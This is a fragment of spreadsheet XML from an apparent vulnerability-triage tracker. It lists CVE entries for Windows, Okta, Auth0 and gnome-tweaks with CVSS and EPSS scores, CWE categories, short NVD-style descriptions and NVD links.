t="inlineStr" /><c r="M1038" s="5" t="inlineStr" /><c r="N1038" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1038" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1038" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1038" s="5" t="inlineStr" /><c r="R1038" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1038" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1038" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69566</t></is></c></row><row r="1039"><c r="A1039" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1039" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1039" s="5" t="inlineStr"><is><t>CVE-2026-71329</t></is></c><c r="D1039" s="5" t="n"><v>6.8</v></c><c r="E1039" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1039" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1039" s="5" t="inlineStr" /><c r="H1039" s="5" t="n"><v>0.003</v></c><c r="I1039" s="5" t="inlineStr" /><c r="J1039" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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39" s="5" t="inlineStr" /><c r="M1039" s="5" t="inlineStr" /><c r="N1039" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1039" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1039" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1039" s="5" t="inlineStr" /><c r="R1039" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1039" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1039" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71329</t></is></c></row><row r="1040"><c r="A1040" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1040" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1040" s="5" t="inlineStr"><is><t>CVE-2026-71348</t></is></c><c r="D1040" s="5" t="n"><v>6.8</v></c><c r="E1040" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1040" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1040" s="5" t="inlineStr" /><c r="H1040" s="5" t="n"><v>0.004</v></c><c r="I1040" s="5" t="inlineStr" /><c r="J1040" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K104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40" s="5" t="inlineStr" /><c r="M1040" s="5" t="inlineStr" /><c r="N1040" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1040" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1040" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1040" s="5" t="inlineStr" /><c r="R1040" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1040" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1040" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71348</t></is></c></row><row r="1041"><c r="A1041" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1041" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1041" s="5" t="inlineStr"><is><t>CVE-2026-71349</t></is></c><c r="D1041" s="5" t="n"><v>6.8</v></c><c r="E1041" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1041" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1041" s="5" t="inlineStr" /><c r="H1041" s="5" t="n"><v>0.004</v></c><c r="I1041" s="5" t="inlineStr" /><c r="J1041" s="5" t="inlineStr" /><c r="K1041" s="5" t="inlineStr" /><c r="L1041" s="5" t="inlineStr" /><c r="M1041" s="5" t="inlineStr" /><c r="N1041" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1041" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1041" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1041" s="5" t="inlineStr" /><c r="R1041" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1041" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1041" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71349</t></is></c></row><row r="1042"><c r="A1042" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1042" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1042" s="5" t="inlineStr"><is><t>CVE-2026-71350</t></is></c><c r="D1042" s="5" t="n"><v>6.8</v></c><c r="E1042" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1042" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1042" s="5" t="inlineStr" /><c r="H1042" s="5" t="n"><v>0.004</v></c><c r="I1042" s="5" t="inlineStr" /><c r="J1042" s="5" t="inlineStr" /><c r="K1042" s="5" t="inlineStr" /><c r="L1042" s="5" t="inlineStr" /><c r="M1042" s="5" t="inlineStr" /><c r="N1042" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1042" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1042" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1042" s="5" t="inlineStr" /><c r="R1042" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1042" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1042" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71350</t></is></c></row><row r="1043"><c r="A1043" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1043" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1043" s="5" t="inlineStr"><is><t>CVE-2026-72985</t></is></c><c r="D1043" s="5" t="n"><v>6.8</v></c><c r="E1043" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1043" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1043" s="5" t="inlineStr" /><c r="H1043" s="5" t="n"><v>0.003</v></c><c r="I1043" s="5" t="inlineStr" /><c r="J1043" s="5" t="inlineStr" /><c r="K1043" s="5" t="inlineStr" /><c r="L1043" s="5" t="inlineStr" /><c r="M1043" s="5" t="inlineStr" /><c r="N1043" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1043" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1043" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1043" s="5" t="inlineStr" /><c r="R1043" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1043" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Shadow Copy allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1043" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72985</t></is></c></row><row r="1044"><c r="A1044" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1044" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1044" s="5" t="inlineStr"><is><t>CVE-2026-72999</t></is></c><c r="D1044" s="5" t="n"><v>6.8</v></c><c r="E1044" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1044" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1044" s="5" t="inlineStr" /><c r="H1044" s="5" t="n"><v>0.003</v></c><c r="I1044" s="5" t="inlineStr" /><c r="J1044" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K104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044" s="5" t="inlineStr" /><c r="M1044" s="5" t="inlineStr" /><c r="N1044" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1044" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1044" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1044" s="5" t="inlineStr" /><c r="R1044" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1044" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Hub Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1044" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72999</t></is></c></row><row r="1045"><c r="A1045" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1045" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1045" s="5" t="inlineStr"><is><t>CVE-2026-74859</t></is></c><c r="D1045" s="5" t="n"><v>6.8</v></c><c r="E1045" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1045" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1045" s="5" t="inlineStr" /><c r="H1045" s="5" t="n"><v>0.001</v></c><c r="I1045" s="5" t="inlineStr" /><c r="J1045" s="5" t="inlineStr" /><c r="K1045" s="5" t="inlineStr" /><c r="L1045" s="5" t="inlineStr" /><c r="M1045" s="5" t="inlineStr" /><c r="N1045" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1045" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1045" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1045" s="5" t="inlineStr" /><c r="R1045" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1045" s="5" t="inlineStr"><is><t>The shell theme installer in gnome-tweaks extracts user-supplied ZIP archives without validating archive member paths. As a result, a crafted theme archive can write files outside ~/.themes by using ../ path traversal, absolute paths, or symlink entries.</t></is></c><c r="T1045" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74859</t></is></c></row><row r="1046"><c r="A1046" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1046" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1046" s="5" t="inlineStr"><is><t>CVE-2026-77892</t></is></c><c r="D1046" s="5" t="n"><v>6.8</v></c><c r="E1046" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1046" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1046" s="5" t="inlineStr" /><c r="H1046" s="5" t="n"><v>0.003</v></c><c r="I1046" s="5" t="inlineStr" /><c r="J1046" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K104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46" s="5" t="inlineStr" /><c r="M1046" s="5" t="inlineStr" /><c r="N1046" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1046" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1046" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1046" s="5" t="inlineStr" /><c r="R1046" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1046" s="5" t="inlineStr"><is><t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1046" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t></is></c></row><row r="1047"><c r="A1047" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1047" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1047" s="5" t="inlineStr"><is><t>CVE-2026-78451</t></is></c><c r="D1047" s="5" t="n"><v>6.8</v></c><c r="E1047" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1047" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1047" s="5" t="inlineStr" /><c r="H1047" s="5" t="n"><v>0.004</v></c><c r="I1047" s="5" t="inlineStr" /><c r="J1047" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1047"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47" s="5" t="inlineStr" /><c r="M1047" s="5" t="inlineStr" /><c r="N1047" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1047" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1047" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1047" s="5" t="inlineStr" /><c r="R1047" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1047" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1047" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t></is></c></row><row r="1048"><c r="A1048" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1048" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1048" s="5" t="inlineStr"><is><t>CVE-2026-78579</t></is></c><c r="D1048" s="5" t="n"><v>6.8</v></c><c r="E1048" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1048" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1048" s="5" t="inlineStr" /><c r="H1048" s="5" t="n"><v>0.002</v></c><c r="I1048" s="5" t="inlineStr" /><c r="J1048" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1048" s="5" t="inlineStr" /><c r="L1048" s="5" t="inlineStr" /><c r="M1048" s="5" t="inlineStr" /><c r="N1048" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1048" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1048" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1048" s="5" t="inlineStr" /><c r="R1048" s="5" t="inlineStr"><is><t>CWE-90</t></is></c><c r="S1048" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize SAML assertion attribute values before interpolating them into LDAP search filters in the LDAP datastore configuration. The raw values are substituted directly into the filter string and passed to the LDAP search operation, resulting in modification of the intended query logic.</t></is></c><c r="T1048" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78579</t></is></c></row><row r="1049"><c r="A1049" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1049" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1049" s="5" t="inlineStr"><is><t>CVE-2026-69350</t></is></c><c r="D1049" s="5" t="n"><v>6.7</v></c><c r="E1049" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1049" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1049" s="5" t="inlineStr" /><c r="H1049" s="5" t="n"><v>0.003</v></c><c r="I1049" s="5" t="inlineStr" /><c r="J1049" s="5" t="inlineStr" /><c r="K1049" s="5" t="inlineStr" /><c r="L1049" s="5" t="inlineStr" /><c r="M1049" s="5" t="inlineStr" /><c r="N1049" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1049" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1049" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1049" s="5" t="inlineStr" /><c r="R1049" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1049" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1049" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69350</t></is></c></row><row r="1050"><c r="A1050" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1050" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1050" s="5" t="inlineStr"><is><t>CVE-2026-69373</t></is></c><c r="D1050" s="5" t="n"><v>6.7</v></c><c r="E1050" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1050" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1050" s="5" t="inlineStr" /><c r="H1050" s="5" t="n"><v>0.003</v></c><c r="I1050" s="5" t="inlineStr" /><c r="J1050" s="5" t="inlineStr" /><c r="K1050" s="5" t="inlineStr" /><c r="L1050" s="5" t="inlineStr" /><c r="M1050" s="5" t="inlineStr" /><c r="N1050" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1050" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1050" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1050" s="5" t="inlineStr" /><c r="R1050" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S1050" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1050" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69373</t></is></c></row><row r="1051"><c r="A1051" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1051" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1051" s="5" t="inlineStr"><is><t>CVE-2026-69449</t></is></c><c r="D1051" s="5" t="n"><v>6.7</v></c><c r="E1051" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1051" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1051" s="5" t="inlineStr" /><c r="H1051" s="5" t="n"><v>0.004</v></c><c r="I1051" s="5" t="inlineStr" /><c r="J1051" s="5" t="inlineStr" /><c r="K1051" s="5" t="inlineStr" /><c r="L1051" s="5" t="inlineStr" /><c r="M1051" s="5" t="inlineStr" /><c r="N1051" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1051" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1051" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1051" s="5" t="inlineStr" /><c r="R1051" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1051" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows BitLocker allows an authorized attacker to execute code locally.</t></is></c><c r="T1051" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69449</t></is></c></row><row r="1052"><c r="A1052" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1052" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1052" s="5" t="inlineStr"><is><t>CVE-2026-69820</t></is></c><c r="D1052" s="5" t="n"><v>6.7</v></c><c r="E1052" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1052" s="5" t="inlineStr" /><c r="H1052" s="5" t="n"><v>0.003</v></c><c r="I1052" s="5" t="inlineStr" /><c r="J1052" s="5" t="inlineStr" /><c r="K1052" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1052" s="5" t="inlineStr" /><c r="M1052" s="5" t="inlineStr" /><c r="N1052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1052" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1052" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1052" s="5" t="inlineStr" /><c r="R1052" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1052" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1052" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69820</t></is></c></row><row r="1053"><c r="A1053" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1053" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1053" s="5" t="inlineStr"><is><t>CVE-2026-71339</t></is></c><c r="D1053" s="5" t="n"><v>6.7</v></c><c r="E1053" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1053" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1053" s="5" t="inlineStr" /><c r="H1053" s="5" t="n"><v>0.003</v></c><c r="I1053" s="5" t="inlineStr" /><c r="J1053" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K105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53" s="5" t="inlineStr" /><c r="M1053" s="5" t="inlineStr" /><c r="N1053" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1053" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1053" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1053" s="5" t="inlineStr" /><c r="R1053" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1053" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1053" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71339</t></is></c></row><row r="1054"><c r="A1054" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1054" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1054" s="5" t="inlineStr"><is><t>CVE-2026-72927</t></is></c><c r="D1054" s="5" t="n"><v>6.7</v></c><c r="E1054" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1054" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1054" s="5" t="inlineStr" /><c r="H1054" s="5" t="n"><v>0.003</v></c><c r="I1054" s="5" t="inlineStr" /><c r="J1054" s="5" t="inlineStr" /><c r="K1054" s="5" t="inlineStr" /><c r="L1054" s="5" t="inlineStr" /><c r="M1054" s="5" t="inlineStr" /><c r="N1054" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1054" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1054" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1054" s="5" t="inlineStr" /><c r="R1054" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1054" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Winsock allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1054" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72927</t></is></c></row><row r="1055"><c r="A1055" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1055" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1055" s="5" t="inlineStr"><is><t>CVE-2026-72935</t></is></c><c r="D1055" s="5" t="n"><v>6.7</v></c><c r="E1055" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1055" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1055" s="5" t="inlineStr" /><c r="H1055" s="5" t="n"><v>0.003</v></c><c r="I1055" s="5" t="inlineStr" /><c r="J1055" s="5" t="inlineStr" /><c r="K1055" s="5" t="inlineStr" /><c r="L1055" s="5" t="inlineStr" /><c r="M1055" s="5" t="inlineStr" /><c r="N1055" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1055" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1055" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1055" s="5" t="inlineStr" /><c r="R1055" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1055" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1055" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72935</t></is></c></row><row r="1056"><c r="A1056" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1056" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1056" s="5" t="inlineStr"><is><t>CVE-2026-72948</t></is></c><c r="D1056" s="5" t="n"><v>6.7</v></c><c r="E1056" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1056" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1056" s="5" t="inlineStr" /><c r="H1056" s="5" t="n"><v>0.004</v></c><c r="I1056" s="5" t="inlineStr" /><c r="J1056" s="5" t="inlineStr" /><c r="K1056" s="5" t="inlineStr" /><c r="L1056" s="5" t="inlineStr" /><c r="M1056" s="5" t="inlineStr" /><c r="N1056" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1056" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1056" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1056" s="5" t="inlineStr" /><c r="R1056" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1056" s="5" t="inlineStr"><is><t>Relative path traversal in Windows DNS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1056" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72948</t></is></c></row><row r="1057"><c r="A1057" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1057" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1057" s="5" t="inlineStr"><is><t>CVE-2026-78625</t></is></c><c r="D1057" s="5" t="n"><v>6.7</v></c><c r="E1057" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1057" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1057" s="5" t="inlineStr" /><c r="H1057" s="5" t="n"><v>0.002</v></c><c r="I1057" s="5" t="inlineStr" /><c r="J1057" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1057" s="5" t="inlineStr" /><c r="L1057" s="5" t="inlineStr" /><c r="M1057" s="5" t="inlineStr" /><c r="N1057" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1057" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1057" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1057" s="5" t="inlineStr" /><c r="R1057" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1057" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize dashboard label values before writing them into generated PHP configuration files. The generated file is automatically included during authentication requests, resulting in execution with the privileges of the web server process.</t></is></c><c r="T1057" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78625</t></is></c></row><row r="1058"><c r="A1058" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1058" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1058" s="5" t="inlineStr"><is><t>CVE-2026-78630</t></is></c><c r="D1058" s="5" t="n"><v>6.7</v></c><c r="E1058" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1058" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1058" s="5" t="inlineStr" /><c r="H1058" s="5" t="n"><v>0.002</v></c><c r="I1058" s="5" t="inlineStr" /><c r="J1058" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1058" s="5" t="inlineStr" /><c r="L1058" s="5" t="inlineStr" /><c r="M1058" s="5" t="inlineStr" /><c r="N1058" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1058" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1058" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1058" s="5" t="inlineStr" /><c r="R1058" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S1058" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not neutralize shell metacharacters in SNMP configuration values before a privileged script uses them to construct OS commands. An authenticated local user with access to the management interface can supply crafted values, resulting in the execution of arbitrary OS commands with root privileges.</t></is></c><c r="T1058" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78630</t></is></c></row><row r="1059"><c r="A1059" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1059" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1059" s="5" t="inlineStr"><is><t>CVE-2026-85981</t></is></c><c r="D1059" s="5" t="n"><v>6.7</v></c><c r="E1059" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1059" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1059" s="5" t="inlineStr" /><c r="H1059" s="5" t="n"><v>0.001</v></c><c r="I1059" s="5" t="inlineStr" /><c r="J1059" s="5" t="inlineStr" /><c r="K1059" s="5" t="inlineStr" /><c r="L1059" s="5" t="inlineStr" /><c r="M1059" s="5" t="inlineStr" /><c r="N1059" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1059" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1059" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1059" s="5" t="inlineStr" /><c r="R1059" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1059" s="5" t="inlineStr"><is><t>The administrative panel of the Auth0 AD/LDAP Connector (versions 6.5.0 and earlier) listens on the local loopback interface without requiring authentication. This allows a local, low-privileged user or process on the host system to access the panel's management endpoints without credentials. Through these endpoints, a local user can read configuration details, including plaintext Active Directory service account credentials, and modify connector settings.</t></is></c><c r="T1059" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85981</t></is></c></row><row r="1060"><c r="A1060" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1060" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1060" s="5" t="inlineStr"><is><t>CVE-2026-52486</t></is></c><c r="D1060" s="5" t="n"><v>6.6</v></c><c r="E1060" s="5" 